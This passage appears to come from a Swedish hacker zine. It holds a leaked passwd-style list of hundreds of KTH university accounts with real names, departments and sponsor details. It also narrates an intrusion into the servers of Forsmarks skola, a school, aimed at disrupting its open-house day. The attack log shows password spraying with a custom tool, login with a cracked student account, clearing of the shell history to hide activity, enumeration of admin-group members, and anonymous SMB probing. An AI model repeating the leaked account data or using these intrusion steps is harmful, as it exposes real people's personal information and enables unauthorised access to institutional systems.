  620. oaolsson:x:9134:60001:Anders Olsson,STUD,,,,040614,iocc/kempe,050614,,u1x64mda:/afs/it.kth.se/home/a/oaolsson:/bin/false
  621. terfelt:x:10052:60001:Rickard Terfelt,e88,,,,19990318,jj/robertr,20000318:/afs/it.kth.se/home/e88/terfelt:/bin/false
  622. jokela:x:10214:60001:Tony Jokela,e90,,,,20000428,wombat/kff,20010428:/afs/it.kth.se/home/e90/jokela:/bin/false
  623. jonson:x:10218:60001:Tobias Jonson,e90,,,,941208,flag,971208:/afs/it.kth.se/home/e90/jonson:/bin/false
  624. erikl:x:10253:60001:Erik Lundstr�m,e90,,,,19991217,mzi/robertr,20001217:/afs/it.kth.se/home/e90/erikl:/bin/false
  625. elessawi:x:10394:60001:Khalid El Essawi,e89,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e89/elessawi:/bin/false
  626. cat:x:10536:60001:Catrin Tufvesson,e89,,,,960221,flag/le,990221:/afs/it.kth.se/home/e89/cat:/bin/false
  627. bolme:x:10621:60001:Linda Bolme,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/bolme:/bin/false
  628. dita:x:10638:60001:R�zvan Dit�,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/dita:/bin/false
  629. johane:x:10640:60001:Johan Ebbinghaus,e91,,,,19990414,jsand/tyugu,20000414:/afs/it.kth.se/home/e91/johane:/bin/false
  630. hamid:x:10641:60001:Hamid Ebrahimi,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/hamid:/bin/false
  631. michaele:x:10644:60001:Michael Eklund,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/michaele:/bin/false
  632. peder:x:10664:60001:Peder Gjervaldsaeter,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/peder:/bin/false
  633. garde:x:10674:60001:Johan G�rde,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/garde:/bin/false
  634. haji:x:10677:60001:Kahn Harati Haji,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/haji:/bin/false
  635. hallberg:x:10678:60001:Ilja Hallberg,guest,,,,950518,rom/rom,980518:/afs/it.kth.se/home/guest/hallberg:/bin/false
  636. erikh:x:10681:60001:Erik Hamnqvist,e91,,,,20000408,wombat/mfd,20010408:/afs/it.kth.se/home/e91/erikh:/bin/false
  637. hamzeehe:x:10682:60001:Mohammad Hamzeehe,e91,,,,980120,jj/tyugu,990120:/afs/it.kth.se/home/e91/hamzeehe:/bin/false
  638. kasujja:x:10721:60001:David Kasujja,e91,,,,960114,flag/rassul,990114:/afs/it.kth.se/home/e91/kasujja:/bin/false
  639. kullgren:x:10728:60001:Georg Kullgren,e91,,,,940131,cwe,960131:/afs/it.kth.se/home/e91/kullgren:/bin/false
  640. mlarsson:x:10734:60001:Magnus Larsson,e91,,,,940922,flag/le,970922:/afs/it.kth.se/home/e91/mlarsson:/bin/false
  641. lindblad:x:10739:60001:Magnus Lindblad,e91,,,,951106,flag/le,981106:/afs/it.kth.se/home/e91/lindblad:/bin/false
  642. orjanl:x:10749:60001:Orjan Ljungqvist,e91,,,,950207,rom,980207:/afs/it.kth.se/home/e91/orjanl:/bin/false
  643. martinl:x:10750:60001:Martin Lundhagen,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/martinl:/bin/false
  644. malmsten:x:10758:60001:Jonas Malmsten,e91,,,,941101,rom/le,971101:/afs/it.kth.se/home/e91/malmsten:/bin/false
  645. jespern:x:10769:60001:Jesper Norberg,e91,,,,950217,flag,980217:/afs/it.kth.se/home/e91/jespern:/bin/false
  646. nordwall:x:10771:60001:Patrik Nordwall,e91,,,,951127,flag/le,981127:/afs/it.kth.se/home/e91/nordwall:/bin/false
  647. nyren:x:10777:60001:Mattias Nyren,e91,,,,951118,flag/le,981118:/afs/it.kth.se/home/e91/nyren:/bin/false
  648. rosso:x:10800:60001:Rosso Salmanzadeh,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/rosso:/bin/false
  649. sebi:x:10809:60001:Ezzatullah Sebi,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/sebi:/bin/false
  650. sixtenss:x:10814:60001:Johan Sixtensson,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/sixtenss:/bin/false
  651. pernilla:x:10815:60001:Pernilla Sjelvgren,e91,,,,19991108,jj/robertr,20001108:/afs/it.kth.se/home/e91/pernilla:/bin/false
  652. strandbe:x:10824:60001:Henrik Strandberg,e91,,,,951118,flag/le,981118:/afs/it.kth.se/home/e91/strandbe:/bin/false
  653. stroberg:x:10825:60001:Dan Stroberg,e91,,,,960114,flag/rassul,990114:/afs/it.kth.se/home/e91/stroberg:/bin/false
  654. stahl:x:10827:60001:Johan Stahl,e91,,,,941026,flag/le,971026:/afs/it.kth.se/home/e91/stahl:/bin/false
  655. wallen:x:10855:60001:Simon Wallen,e91,,,,960129,flag/joachim,990129:/afs/it.kth.se/home/e91/wallen:/bin/false
  656. mojtahed:x:10934:60001:Peza Mojtahedi,ppse93,cwe,930824:/afs/it.kth.se/home/e87/mojtahed:/bin/false
  657. oldhans:x:11003:60001:Hans Berggren,IM,,,1144,890412,root/flag,961231:/afs/it.kth.se/home/staff/hans:/bin/false
  658. jimpa:x:11004:60001:Jim Svensson, turnedoff, Staff,,,,,/flag:/afs/it.kth.se/home/staff/jimpa:/bin/false
  659. ritaj:x:11006:60001:Rita Johnsson, TKS,,,980706,mier/holmis:/afs/it.kth.se/home/tslab/ritaj:/bin/false
  660. bergdahl:x:11009:60001:Hakan Bergdahl,KTH-Electrum,TDS,,1436,890214,peppe/le,20010101:/afs/it.kth.se/home/ds/bergdahl:/bin/false
  661. henriks:x:11010:60001:Henrik Svensson,KTH-Electrum,,,1441,890215,peppe/bjorn,:/afs/it.kth.se/home/admin/henriks:/bin/false
  662. ragnara:x:11011:60001:Ragnar Arve,is-ki,,,,941101,flag,941101:/afs/it.kth.se/home/is-ki/ragnara:/bin/false
  663. perixon:x:11017:60001:Per Eriksson, SU/DSV,,,,,/flag:/afs/it.kth.se/home/dsv/perixon:/bin/false
  664. jasmin:x:11068:60001:Jasmin Jahanara,it-univ,,,,20030325,hans/erlandn,20040325:/afs/it.kth.se/home/it-univ/jasmin:/bin/false
  665. marga:x:11078:60001:Margareta Linnarsson,IMIT,,,,050503,richard/linnros,080503,,u1x6y4ru:/afs/it.kth.se/home/u/marga:/bin/false
  666. christer:x:11100:60001:Christer Helen,it-univ,,,,20010226,elu/[email protected],20040226,,u19ytk7a:/afs/it.kth.se/home/it-univ/christer:/bin/false
  667. frej:x:11101:60001:Frej Drejhammar,cslab,,,,20010306,glenn/seif,20060306:/afs/it.kth.se/home/cslab/frej:/bin/false
  668. zeffer:x:11102:60001:Hakan Zeffer,cslab,,,,20010319,elu/matsbror,20040319:/afs/it.kth.se/home/cslab/zeffer:/bin/false
  669. andres:x:11103:60001:Andres Martinelli,IMIT/LECS,,,,20010319,elu/mfd,20040319,,u1u3j9x3:/afs/it.kth.se/home/3/andresm:/bin/false
  670. andresm:x:11103:60001:Andres Martinelli,IMIT/LECS,,,,20010319,elu/mfd,20040319,,u1u3j9x3:/afs/it.kth.se/home/3/andresm:/bin/false
  671. hvelayos:x:11104:60001:Hector Luis Velayos Munoz,tts,,,,20010514,glenn/gk,20020514:/afs/it.kth.se/home/tts/hvelayos:/bin/false
  672. georgios:x:11105:60001:George Koudouridis,guest,,,,20010322,glenn/gk,20020322:/afs/it.kth.se/home/guest/georgios:/bin/false
  673. jinghai:x:11106:60001:Jinghai Rao,imit,,,,20030415,hans/matskin,20040415:/afs/it.kth.se/home/imit/jinghai:/bin/false
  674. swlee:x:11107:60001:Sung-Woo Lee,cslab,,,,20010615,elu/[email protected],20030615:/afs/it.kth.se/home/cslab/swlee:/bin/false
  675. teoy:x:11108:60001:Young-Meng Teo,guest,,,,20010409,elu/rassul,20020409:/afs/it.kth.se/home/guest/teoy:/bin/false
  676. lenar:x:11109:60001:Lena Ramfelt,guest,,,980706,mier/fredrik:/afs/it.kth.se/home/guest/lenar:/bin/false
  677. mikaelc:x:11110:60001:Mikael Collin,imit,,,,20010730,elu/[email protected],20060730:/afs/it.kth.se/home/imit/mikaelc:/bin/false
  678. mladen:x:11111:60001:Mladen Nikitovic,imit,,,,20010730,elu/[email protected],20060730:/afs/it.kth.se/home/imit/mladen:/bin/false
  679. irem:x:11112:60001:Irem Aktug,imit,,,,20030815,hans/mfd,20060815:/afs/it.kth.se/home/imit/irem:/bin/false
  680. hakan:x:11114:60001:Hakan Olsson,guest,,,,20011120,glenn/hasse,20021120:/afs/it.kth.se/home/guest/hakan:/bin/false
  681. tobiasd:x:11115:60001:Tobias Dalhammar,imit,,,,20030904,hans/bjorn,20060904:/afs/it.kth.se/home/t/tobiasd:/bin/false
  682. sermed:x:11118:60001:Sermed Al-abbasi,tslab,,,,20020123,glenn/bjorn,20030123:/afs/it.kth.se/home/tslab/sermed:/bin/false
  683. alex:x:11119:60001:Alexander La Torre,tslab,,,,20020129,hans/sandoval,20030129:/afs/it.kth.se/home/tslab/alex:/bin/false
  684. nawaz:x:11120:60001:Muhammad Nawaz,IMIT,,,,040713,julio/Ostling,050713,,u1qm8ypo:/afs/it.kth.se/home/o/nawaz:/bin/false
  685. mikac:x:11121:60001:Mika Cohen,imit,,,,20020205,hans/mfd,20080205:/afs/it.kth.se/home/imit/mikac:/bin/false
  686. zeb:x:11122:60001:Zacharias El Banna,cslab,,,,20020318,glenn/seif,20030318:/afs/it.kth.se/home/cslab/zeb:/bin/false
  687. janbog:x:11123:60001:Jan Bogdanski,imit,,,,20031110,richard/[email protected],20061110:/afs/it.kth.se/home/j/janbog:/bin/false
  688. barbros:x:11124:60001:Barbro Redin,guest,,,,20020416,glenn/gk,20030416:/afs/it.kth.se/home/guest/barbros:/bin/false
  689. drapella:x:11125:60001:Joanna Drapella,x01,,,,20020619,iocc/lena,20030619:/afs/it.kth.se/home/x01/drapella:/bin/false
  690. los:x:11126:60001:Lars Str�mberg,guest,,,,941011,jimpa/cwe,951011:/afs/it.kth.se/home/guest/los:/bin/false
  691. bse:x:11128:60001:Svante Eriksson,imit,,,,20020820,hans/lee,20070820:/afs/it.kth.se/home/imit/bse:/bin/false
  692. ukar:x:11129:60001:Ulrik Karlsson,imit,,,,20020820,hans/bjorn,20030820:/afs/it.kth.se/home/imit/ukar:/bin/false
  693. pravesh:x:11130:60001:Pravesh Biyani,imit,,,,20020903,hans/gk,20070903:/afs/it.kth.se/home/imit/pravesh:/bin/false
  694. lrusu:x:11131:60001:Lazar Rusu,imit,,,,20020904,hans/bjorn,20030904:/afs/it.kth.se/home/imit/lrusu:/bin/false
  695. olofh:x:11132:60001:Olof Hagsand,imit,,,,20020918,hans/gk,20120918:/afs/it.kth.se/home/imit/olofh:/bin/false
  696. mahidell:x:11133:60001:Markus Hidell,imit,,,,20021007,iocc/gk,20121007:/afs/it.kth.se/home/imit/mahidell:/bin/false
  697. misha:x:11134:60001:Mihhail Matskin,imit,,,,20021010,iocc/matsbror,20071010:/afs/it.kth.se/home/imit/misha:/bin/false
  698. ctin:x:11136:60001:Constantin Adam,imit,,,,20021112,hans/gk,20081112:/afs/it.kth.se/home/imit/ctin:/bin/false
  699. psj:x:11138:60001:Peter Sjodin,imit,,,,20021202,hans/hans,20071202:/afs/it.kth.se/home/imit/psj:/bin/false
  700. aligh:x:11139:60001:Ali Ghodsi,imit,,,,20030314,hans/rassul,20080314,,u1oux2k2:/afs/it.kth.se/home/imit/aligh:/bin/false
  701. peterl:x:11140:60001:Peter Lofkvist,imit,,,,20030320,hans/bjorn,20060320:/afs/it.kth.se/home/imit/peterl:/bin/false
  702. robzet:x:11141:60001:Robert Zettinger,guest,,,,941201,rom,971201:/afs/it.kth.se/home/guest/robzet:/bin/false
  703. oli:x:11142:60001:Oscar Ljungberg,guest,,,,941227,flag/flag,971227:/afs/it.kth.se/home/guest/oli:/bin/false
  704. fallsjo:x:11143:60001:Joakim Fallsj�,is-ki,,,,950105,jimpa/rom,980105:/afs/isk.kth.se/home/f/fallsjo:/bin/false
  705. poriol:x:11144:60001:Pere Oriol,imit,,,,20030324,hans/matsbror,20040324:/afs/it.kth.se/home/imit/poriol:/bin/false
  706. dick56:x:11145:60001:Dick Schefstrom,imit,,,,20030327,hans/bjorn,20040327:/afs/it.kth.se/home/imit/dick56:/bin/false
  707. petra:x:11146:60001:Petra F�rm,p,,,,20031015,richard/[email protected],20061015:/afs/it.kth.se/home/p/petra:/bin/false
  708. ozcan:x:11147:60001:�scan �zturk,IMIT,,,,040109,hans/gk,070109,,u15tmbpt:/afs/it.kth.se/home/t/ozcan:/bin/false
  709. workshet:x:11148:60001:Workshet Lamenew,IMIT,,,,040116,hans/bjorn,070116,,u147pz4g:/afs/it.kth.se/home/g/workshet:/bin/false
  710. roshan:x:11149:60001:Roshan Weerasekera,IMIT,,,,050224,iocc/iocc,070224,,u17yfjfs:/afs/it.kth.se/home/s/roshan:/bin/false
  711. jmbit:x:11150:60001:Julio Mercado Test,IMIT,,,,040309,hans/hans,070309,,u1v489zo:/afs/it.kth.se/home/o/jmbit:/bin/false
  712. dirkb:x:11151:60001:Dirk Brade,IMIT,,,,040310,hans/rassul,060310,,u1rpup3t:/afs/it.kth.se/home/t/dirkb:/bin/false
  713. tim:x:11152:60001:Tim Oijermark,guest,,,,950214,flag/flag,980214:/afs/it.kth.se/home/guest/tim:/bin/false
  714. pkundu:x:11153:60001:Prodip Kundu,IMIT,,,,040510,hans/axel,050510,,u1e8igij:/afs/it.kth.se/home/j/pkundu:/bin/false
  715. leffe:x:11154:60001:Leif Kahlbom,tslab,,,,980706,mier/fredrik,,,u1yx39sa:/afs/it.kth.se/home/tslab/leffe:/bin/false
  716. noz:x:11155:60001:Marilyn E. Noz,guest,,,,950807,flag/maguire,980807:/afs/it.kth.se/home/guest/noz:/bin/false
  717. deegan:x:11156:60001:Tim Deegan,IMIT,,,,040519,hans/psj,050519,,guest:/afs/it.kth.se/home/guest/deegan:/bin/false
  718. nesa:x:11157:60001:Dragoljub Nesic,ds,,,,950328,flag/le,:/afs/it.kth.se/home/ds/nesa:/bin/false
  719. amitava:x:11158:60001:Amitava Mukherjee,IMIT,,,,040601,hans/gk,070601,,u18ry1t3:/afs/it.kth.se/home/3/amitava:/bin/false
  720. voravit:x:11159:60001:Voravit Tanyingyong,IMIT,,,,040608,hans/bjorn,060608,,u13rs86e:/afs/it.kth.se/home/e/voravit:/bin/false
  721. yichuan:x:11160:60001:Yichaun Yu,IMIT,,,,040622,richard/urban,070622,,u1pbw7l0:/afs/it.kth.se/home/0/yichuan:/bin/false
  722. dheepan:x:11161:60001:Gunaratnam Pratheepan,IMIT,,,,040901,hans/bjorn,060901,,u13khgkz:/afs/it.kth.se/home/z/dheepan:/bin/false
  723. bjornagn:x:11162:60001:Bjorn Agnarsson,IMIT,,,,040902,richard/gothelid,070902,,u1ju385y:/afs/it.kth.se/home/y/bjornagn:/bin/false
  724. niklasel:x:11163:60001:Niklas Elfstrom,IMIT,,,,040907,richard/linnros,070907,,u1sdvoc0:/afs/it.kth.se/home/0/niklasel:/bin/false
  725. snorell:x:11164:60001:Susanna Norell,IMIT,,,,040909,richard/anand,050909,,u1gfsahz:/afs/it.kth.se/home/z/snorell:/bin/false
  726. rgd:x:11165:60001:Rina Garcia Diaz,IMIT,,,,041005,richard/gunnarb,051005,,guest:/afs/it.kth.se/home/guest/rgd:/bin/false
  727. bowln:x:11166:60001:Bo Willen,IMIT,,,,041006,richard/lthylen,071006,,u16jebrq:/afs/it.kth.se/home/q/bowln:/bin/false
  728. bilien:x:11167:60001:Johan Bilien,IMIT,,,,041025,hans/bjorn,051025,,u1ai4xjb:/afs/it.kth.se/home/b/bilien:/bin/false
  729. tidstrom:x:11168:60001:Jonas Tidstrom,IMIT,,,,041110,richard/hessmo,071110,,u17zuqt9:/afs/it.kth.se/home/9/tidstrom:/bin/false
  730. jmontagn:x:11169:60001:Johan Montagnat,ds,,,,950612,rom/rassul,960612:/afs/it.kth.se/home/ds/jmontagn:/bin/false
  731. wedberg:x:11170:60001:Kristian Wedberg,guest,,,,950612,flag/flag,960612:/afs/it.kth.se/home/guest/wedberg:/bin/false
  732. mem:x:11171:60001:Magnus Sandberg,staff,,,,950625,rom/jj,980625:/afs/it.kth.se/home/staff/mem:/bin/false
  733. singer:x:11172:60001:Nicolas Singer,guest,,,,950627,rom/mont,960627:/afs/it.kth.se/home/guest/singer:/bin/false
  734. schulte:x:11173:60001:Christian Schulte,guest,,,,950627,rom/mont,960627:/afs/it.kth.se/home/guest/schulte:/bin/false
  735. vvuk:x:11174:60001:Vladimir Vukadinovic,IMIT,,,,041115,hans/gk,051115,,u1p9yrh5:/afs/it.kth.se/home/5/vvuk:/bin/false
  736. steph:x:11175:60001:Stephane N'Dong,guest,,,,950627,rom/mont,960627:/afs/it.kth.se/home/guest/steph:/bin/false
  737. olov:x:11176:60001:Olov Schagerlund,tslab,,,,950627,flag/flag,980627:/afs/it.kth.se/home/tslab/olov:/bin/false
  738. gvozdic:x:11177:60001:Dejan Gvozdic,IMIT,,,,041119,richard/ekenberg,071119,,u14wz4m2:/afs/it.kth.se/home/2/gvozdic:/bin/false
  739. herme:x:11178:60001:Manuel Hermenegildo,guest,,,,950630,rom/mont,980630:/afs/it.kth.se/home/guest/herme:/bin/false
  740. collard:x:11179:60001:Jean-Francois Collard,guest,,,,950809,rom/lisper,960809:/afs/it.kth.se/home/guest/collard:/bin/false
  741. npd:x:11180:60001:Peter Drakenberg,ds,,,,950823,rom/lisper,980823:/afs/it.kth.se/home/ds/npd:/bin/false
  742. wu:x:11181:60001:Wu Handong,ds,,,,950829,flag/le,980829:/afs/it.kth.se/home/ds/wu:/bin/false
  743. liuliu:x:11182:60001:Liu Liu,IMIT,,,,041130,richard/lech,071130,,u1dndktv:/afs/it.kth.se/home/v/liuliu:/bin/false
  744. csa:x:11183:60001:CSA,cslab,,,,950831,flag/le,980831:/:/bin/false
  745. wei:x:11184:60001:Wei Hong Wang,tslab,,,,950901,flag/jano,980901:/afs/it.kth.se/home/tslab/wei:/bin/false
  746. fm:x:11185:60001:Faron Moller,tslab,,,,950906,rom/joachim,980906:/afs/it.kth.se/home/tslab/fm:/bin/false
  747. usama:x:11186:60001:Usama Alyasin,IMIT,,,,041210,richard/anand,051210,,imit:/afs/it.kth.se/home/imit/usama:/bin/false
  748. romerojl:x:11187:60001:Jose-Luis Romero,IMIT,,,,050118,richard/gunnarb,080118,,u1tdc7uk:/afs/it.kth.se/home/k/romerojl:/bin/false
  749. mst:x:11188:60001:Mikael Sundqvist,tslab,,,,980706, mier/fredrik,981018:/afs/it.kth.se/home/tslab/mst:/bin/false
  750. jcardin:x:11189:60001:Julien Cardin,IMIT,,,,050119,richard/bj,080119,,u1v1gsti:/afs/it.kth.se/home/i/jcardin:/bin/false
  751. peltonen:x:11190:60001:Teemu Peltonen,IMIT,,,,050120,hans/axel,060120,,u1xbvkjl:/afs/it.kth.se/home/l/peltonen:/bin/false
  752. gajda:x:11191:60001:Andrzej Gajda,IMIT,,,,050128,richard/bj,080128,,u1q43mmu:/afs/it.kth.se/home/u/gajda:/bin/false
  753. khan:x:11192:60001:Khurram Jahangir Khan,IMIT,,,,050201,hans/bjorn,060201,,u1xy051q:/afs/it.kth.se/home/q/khan:/bin/false
  754. majidbn:x:11193:60001:Majid Baghaei Nejad,IMIT,,,,050208,hans/lrzheng,060208,,u1crhrb9:/afs/it.kth.se/home/9/majidbn:/bin/false
  755. petrav:x:11194:60001:Petra Vinterholt,IMIT,,,,050308,richard/grishin,080308,,u1cxzsu2:/afs/it.kth.se/home/2/petrav:/bin/false
  756. bheinze:x:11195:60001:Birk Heinze,IMIT,,,,050316,richard/mdomeij,060316,,imit:/afs/it.kth.se/home/imit/bheinze:/bin/false
  757. kimp:x:11196:60001:Kim Petersen,IMIT,,,,050316,iocc/axel,070316,,u1wezetk:/afs/it.kth.se/home/k/kimp:/bin/false
  758. audrey:x:11197:60001:Audrey Berrier,IMIT,,,,050318,richard/anand,080318,,u15397oh:/afs/it.kth.se/home/h/audrey:/bin/false
  759. hagstrom:x:11198:60001:Karin Hagstrom,guest,,,,960110,flag/jano,990110:/afs/it.kth.se/home/guest/hagstrom:/bin/false
  760. olof:x:11199:60001:Olof Tornblad,guest,,,,960111,flag/flag,990111:/afs/it.kth.se/home/guest/olof:/bin/false
  761. jonash:x:11200:60001:Jonas Holmberg,guest,,,,960116,flag/jj,990116:/afs/it.kth.se/home/guest/jonash:/bin/false
  762. wosinska:x:11201:60001:Lena Wosinska,IMIT,,,,050323,iocc/iocc,070323,,u17dm074:/afs/it.kth.se/home/4/wosinska:/bin/false
  763. onsten:x:11203:60001:Anneli Onsten,IMIT,,,,050404,richard/gothelid,080404,,u1i81w4r:/afs/it.kth.se/home/r/onsten:/bin/false
  764. knagg:x:11204:60001:Jan Eriksson,guest,,,,960205,flag/flag,990205:/afs/it.kth.se/home/guest/knagg:/bin/false
  765. Knagg:x:11205:60001:Jan Eriksson,ADMIN,,,,960205,flag/flag,990205:/afs/it.kth.se/home/guest/knagg:/bin/false
  766. KNAGG:x:11206:60001:Jan Eriksson,ROOT,,,,960205,flag/flag,990205:/afs/it.kth.se/home/guest/knagg:/bin/false
  767. thommy:x:11207:60001:Thommy Johansson,guest,,,,960205,flag/flag,990205:/afs/it.kth.se/home/guest/thommy:/bin/false
  768. moradi:x:11208:60001:Farshad Moradi,IMIT,,,,050408,hans/rassul,060408,,u1vmxq2m:/afs/it.kth.se/home/m/moradi:/bin/false
  769. zayenz:x:11209:60001:Mikael Lagerkvist,IMIT,,,,050502,iocc/schulte,070502,,u10ee6nk:/afs/it.kth.se/home/k/zayenz:/bin/false
  770. kaih:x:11210:60001:Karl Ingvar Hegemyr,guest,,,,960216,flag/flag,990216:/afs/it.kth.se/home/guest/kaih:/bin/false
  771. kamrani:x:11212:60001:Farzad Kamrani,IMIT,,,,050502,iocc/rassul,070502,,u1kuqftr:/afs/it.kth.se/home/r/kamrani:/bin/false
  772. bradley:x:11213:60001:Gunilla Bradley,media,,,,980706, mier/fredrik,990221:/afs/it.kth.se/home/tslab/bradley:/bin/false
  773. damiend:x:11214:60001:Damien Deolraine,IMIT,,,,050517,richard/grishin,060517,,u103gr6m:/afs/it.kth.se/home/m/damiend:/bin/false
  774. lemats:x:11215:60001:Mats Isaksson,IMIT,,,,050520,richard/lthylen,080520,,u1crjcbp:/afs/it.kth.se/home/p/lemats:/bin/false
  775. daniel:x:11216:60001:Daniel Almgren,ITU,,,,050602,fli/jannecke,060602,,u1uk4zn8:/afs/it.kth.se/home/8/daniel:/bin/false
  776. varmo:x:11217:60001:Varmo Vene,ds,,,,960228,mier/tyugu,20000228:/afs/it.kth.se/home/ds/varmo:/bin/false
  777. jcharrey:x:11218:60001:Jacques Charreyron,guest,,,,960306,flag/tyugu,990306:/afs/it.kth.se/home/guest/jcharrey:/bin/false
  778. xiangl:x:11219:60001:Xiang Lu,IMIT,,,,050602,richard/wosinska,080602,,u1dz5f63:/afs/it.kth.se/home/3/xiangl:/bin/false
  779. greta:x:11220:60001:Greta Jodal,ITU,,,,050607,fli/jannecke,060607,,u1ils446:/afs/it.kth.se/home/6/greta:/bin/false
  780. agneta:x:11222:60001:Agneta Herling,admin,,,,960515,jj/henriks,990515:/afs/it.kth.se/home/admin/agneta:/bin/false
  781. weixing:x:11223:60001:Weixing Wang,IMIT,,,,050610,hans/axel,060610,,u15id90q:/afs/it.kth.se/home/q/weixing:/bin/false
  782. nhe:x:11224:60001:Niklas Hellberg,guest,,,,960604,jj/cwe,990604:/afs/it.kth.se/home/guest/nhe:/bin/false
  783. msj:x:11225:60001:Matts Sj�stedt,guest,,,,960604,jj/cwe,990604:/afs/it.kth.se/home/guest/msj:/bin/false
  784. jiang:x:11226:60001:Jiang Wu,tslab,,,,980706,mier/fredrik,990916:/afs/it.kth.se/home/tslab/jiang:/bin/false
  785. zhibin:x:11227:60001:Zhibin Zhang,IMIT,,,,050609,julio/Zhili,080609,,u1y5sbci:/afs/it.kth.se/home/i/zhibin:/bin/false
  786. torkela:x:11228:60001:Torkel Arnborg,IMIT,,,,050704,hans/hakan,080704,,u1a98fzl:/afs/it.kth.se/home/l/torkela:/bin/false
  787. sauge:x:11229:60001:Sebastien Sauge,IMIT,,,,050705,hans/andkar,060705,,u1rbvktr:/afs/it.kth.se/home/r/sauge:/bin/false
  788. akerman1:x:11230:60001:Johan �kerman,IMIT,,,,050707,hans/ulfk,060707,,u13m1xx2:/afs/it.kth.se/home/2/akerman1:/bin/false
  789. yaghi:x:11231:60001:Haytham Yaghi,IMIT,,,,050708,hans/ismail,060708,,u1qllq1d:/afs/it.kth.se/home/d/yaghi:/bin/false
  790. ahallen:x:11232:60001:Anders Hallen,IMIT,,,,050822,richard/ulfk,080822,,u11ywmz1:/afs/it.kth.se/home/1/ahallen:/bin/false
  791. zhichao:x:11233:60001:Zhichao Ruan,IMIT,,,,050830,richard/min,080830,,u19oyhl4:/afs/it.kth.se/home/4/zhichao:/bin/false
  792. jmvm3:x:11234:60001:Jose Manuel Vargas Martinez,IMIT,,,,050830,richard/gunnarb,080830,,u1ha6ib0:/afs/it.kth.se/home/0/jmvm3:/bin/false
  793.  
  794.  
  795. # listan var f�rj���vla l�ng s� vi fick korta ner den m�nga procent f�r att inte tr�ka ut er alltf�rmycket om vi inte redan gjort det, iofs,
  796. # d� borde du slutat l�sa innan detta, ellerhur? :-)
  797.  
  798.  
  799. #######
  800. # 003 #
  801. #######
  802.  
  803. # Citat fr�n deras egna hemsida forsmark.uu.se:
  804.  
  805. "Forsmarks skola ligger l�ngt fram n�r det g�ller n�tverk. Nyligen byggdes ett helt nytt n�tverk i campus d� �ven
  806. switchar uppgraderades. Varje g�rd best�r av tre paviljonger och f�r tillf�llet nyttjas fyra g�rdar. G�rdarna �r
  807. sammanl�nkade med 1 Gbit/s fiber och sedan har varje g�rd 100 Mbit/s switchat n�t fram till datorerna. Mot Internet
  808. delas skolans 10 Mbit/s och bostadsomr�det sitter sammankopplat med skolan via en 100 Mbit/s fiberl�nk.
  809.  
  810. Forsmarks skola ligger i norra Roslagen, i en natursk�n milj� med gamla anor. Skolan �r ett gymnasium med data-,
  811. energi-, natur- och individuell profilering p� det naturvetenskapliga programmet �rkurs 2-3.
  812.  
  813. Skolan erbjuder ett stort urval av lokala kurser inom data, energi, matematik, spr�k m.m. Forsmarks skola �gs och drivs
  814. av Forsmarks Kraftgrupp AB med �sthammars kommun som huvudman.
  815. �r det n�got du funderar �ver kan du skicka epost till [email protected], eller ett vanligt brev, se adressidan."
  816.  
  817.  
  818. Forsmark har en huvudserver dit m�nga sk�rmar och andra mindre servrar&skrivare �r uppkopplade till
  819. Huvudservern kallar dem f�r 'Oden', Mekkar man root p� den s� har man root p� alla andra.
  820.  
  821. Det hackarna t�nkt g�ra h�r �r att hacka huvudservern Oden och skicka meddelanden & skriva ut papper
  822. p� en �ppetHus-dag d�r det kommer massvis med bes�kare och kikar runt p� skolan.
  823.  
  824.  
  825.  
  826. +---------------------------------------------------+
  827. |EDITOR note: Alla loggar �r kraftigt editerade |
  828. | pga utrymmet. Men ni fattar nog �nd�. |
  829. | |
  830. | N�r loggen b�rjar har precis v�r hacker skaffat |
  831. | fram usernames till forsmark's servrar |
  832. | och ska prova users med l�senord som forsmark. |
  833. +---------------------------------------------------+
  834.  
  835.  
  836. sh-2.05b# ./hehe forsmark <-- pass att prova p� users
  837. Checking user: fs04boge -
  838. Checking user: fs04chja -
  839. Checking user: fs04cosj -
  840. Checking user: fs04dace -
  841. Checking user: fs04dape -
  842. Checking user: fs04elre -
  843. Checking user: fs04hasu -
  844. Checking user: fs04hemo -
  845. Checking user: fs04heve -
  846. Checking user: fs04huhe -
  847. Checking user: fs04jeol -
  848. Checking user: fs04jofa -
  849. Checking user: fs04josv -
  850. Checking user: fs04lisa -
  851. Checking user: fs04otke -
  852. Checking user: fs04sugu -
  853. Checking user: fs04than -
  854. Checking user: fs04ulse -
  855. Checking user: fs03mape -
  856. Checking user: fs03milu -
  857. Checking user: fs03omaz -
  858. Checking user: fs03pewa -
  859. Checking user: fs03sani + <-- hittade en user med det passet.
  860. Checking user: fs03uljo -
  861. Checking user: fs03vipo -
  862.  
  863.  
  864. #
  865. # efter lite snokande p� deras IRCn�tverk
  866. #
  867.  
  868. 02:29 -!- Robin [[email protected]] <- warez?!
  869. 02:29 -!- ircname : Robin
  870. 02:29 -!- channels : @#fbin
  871. 02:29 -!- server : irc.localnet [http://www.debian.org/]
  872. 02:29 -!- idle : 0 days 3 hours 13 mins 27 secs [signon: Wed Sep 14 21:52:30 2005]
  873. 02:29 -!- End of WHOIS
  874.  
  875. #
  876. # inloggade p� huvudburken med usern vi hittade tidigare
  877. #
  878.  
  879. fs03sani@oden /home $ unset HISTFILE
  880. fs03sani@oden /home $ unset LOGFILE
  881.  
  882. fs03sani@oden /home $ id fja
  883. uid=497(fja) gid=12000(l�rare) groups=12000(l�rare),10(wheel)
  884.  
  885. fs03sani@oden /home $ grep wheel /etc/group
  886. wheel:x:10:root,fja,fs03mira, fs03jofl,fs04rogu,fs04pebl,fs04josv
  887.  
  888. s03sani@oden /tmp $ smbclient //munin/fs05guca$
  889. Password:
  890. Anonymous login successful
  891. Domain=[FS] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
  892. smb: \> ls
  893. NT_STATUS_ACCESS_DENIED listing \*
  894.  
  895. 38400 blocks of size 4096. 38400 blocks available
  896. smb: \> dir
